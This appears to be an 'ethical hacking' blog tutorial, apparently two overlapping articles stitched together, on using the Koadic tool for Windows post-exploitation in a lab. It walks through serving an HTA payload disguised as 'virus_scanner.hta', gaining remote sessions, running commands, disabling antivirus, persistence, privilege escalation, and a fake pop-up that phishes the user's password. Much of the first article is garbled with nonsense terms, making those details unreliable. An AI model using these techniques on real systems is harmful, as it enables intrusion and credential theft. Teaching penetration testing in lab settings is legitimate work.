Hello, aspiring ethical hackers. in our previous blogpost, you learnt about windows POST exploitation. In this article, you will learn about koadic, a windows POST exploitation rootkit.
Koadic, is similar to other prntesting tools like Emire and meterpreter in functions but performs most of its operations using windows Scriot Host (c.b. JScript/VB Script)
It also has the capability to server payloads in memory and also have enrcypted communication over SSL and TLS.
let’s see how this tool works.For this we will be using Kali Linux as attacker machine. Our koadic is available by default in its repositories.
As target systems we will be using windows 10 as part of the virtual hacking Lab (Just exchange Windows 10 for Metasploitable 2.)
Koadic can be started with the command shown below.
Here’s how koadic is interface looks.
There are three important tool you need to understand about koadic. They are, stagers, Zombies and implants.
Stagers are the method through which you gain access to the systems you can view all stagers of ‘Koadic by suing command use stag/ss/command.
For example, let’s select mshta stager. This stager cracks a HTA attack to gain initial access. To view the information about this stagers, you can use info command.
All the options are automatically set (include Attacks ip). If you want to change any option, you can do that using the “set” command (Set SRUHOST <attacks IP) etc). After setting all the options, you can execute the module using “run” command.
It creates an URL with a command. This command needs to be executed on the target system.
Since it is an URL don’t make the mistake of executing in a browser as shown.
You will get a Zombie but it will time our soon as shown below.
Open a CMD (or remember, you as in Post-exploitation stage) and execute the command as shown below.
You will get a LIVE Zombie as shown below.
It’s time to define a Zombie in koadic, now. Zombies in koadic are like a shell back or a sessions (similiar to Meterpreter in metasploit). You can view all the zombies you got using “Zombies” command.
You can interact with a specific Zombie using command as shown below.
Next comes, implants. Implants in koadic is a name for all Post-exploitation operations. you can perform using Zombie. you can view all the implant just like you saw stagers.
They are divided into sections based on the purpose they fulfill.
For example, let’s see all gather modules. they help in gathering information on the target system.
Let’s see the “enum_users” implants.
All you have to do to use the implant is to set the ID of the Zombie and execute it.
As you can see, there is only one user on the target system. His name is ADMIN.
Manager implants help us to enable remote desktop, hill AV or execute a command on the target system.
Let’s use the exec_cmd implant.
By default, it is set to execute the command “hostname” on the target system and display its result.
The “phish” implants do the what they do. The phish the target users.
Let’s use it to capture password.
When executed, it pops up a windows on the target system asking for his/her password.
If the target user falls for it, his password is captured. This implant can be used to get any password with a bit of social engineering of course.
The “for” section of implants has implant related to them voice, thunderstand etc.
The inject implants inject there that process.
Similarly, the ‘util’ implants a useful in uploading downloading, files to and from the target systems.
Koadic has implants that used to established persistence.
There are even implant that help in privilege escalation.
Remember, we have a low privileged Zombie. Let’s use folders implant to get a Zombie with elevated privileges on the target system.
Set the payload a ‘0’ and Zombie ID.
After all the options are set, execute the implants.
Let’s check its starting.
As you can see, we now have a elevated session. That’s all about Koadic.
Hello aspiring Ethical Hackers. In this article you will learn about a Windows POST Exploitation tool named Koadic. Koadic, or COM command and control is a Rootkit tool that is used for Windows POST exploitation. It is similar to Meterpreter and Powershell Empire except that it performs most of its operations using Windows Script Host. i.e. JScript and Visual Basic Script.
The good thing about Koadic is that it is compatible with almost all the versions of Windows from Windows 2000 to windows 10. It also has the ability to serve payloads in memory and is updated to run with newly released Python 3. Koadic can be cloned from Github as shown below.
Once the repository is cloned, we can navigate into that directory and install the requirements needed for using koadic.
Once the requirements are all installed, koadic can be started. It can be started using the command shown below.
./koadic
Koadic has two important components. They are,
- Stagers
- Implants.
Stagers are used to get initial sessions which are called as Zombies. Once Koadic is started, we can have a look at various stagers of koadic using command shown below.
use stager <tab> <tab>
Let’s use the Java script mshta stager. This stager serves payloads in memory using MSHTA.exe Html applications.
Set the SRVHOST, SRVPORT and ENDPOINT (name of the stager we create) options and execute the stager using run command.
As you can see in the above image, the payload is ready. Once victims visit this link, the virus_scanner.hta payload starts downloading on the target machine. Once the victim executes it, we get a ZOMBIE on a attacker machine as shown in the image below. Zombie in Koadic is just like a session in Metasploit.
The “zombies” command can be used to view all the sessions we have.
Every zombie session is given a session id starting from 0 which can be used for interacting with it. For example, the zombie session I got has been assigned ID “0”. Let’s interact with it.
Readers will learn more about this tool in Part 2 of this article.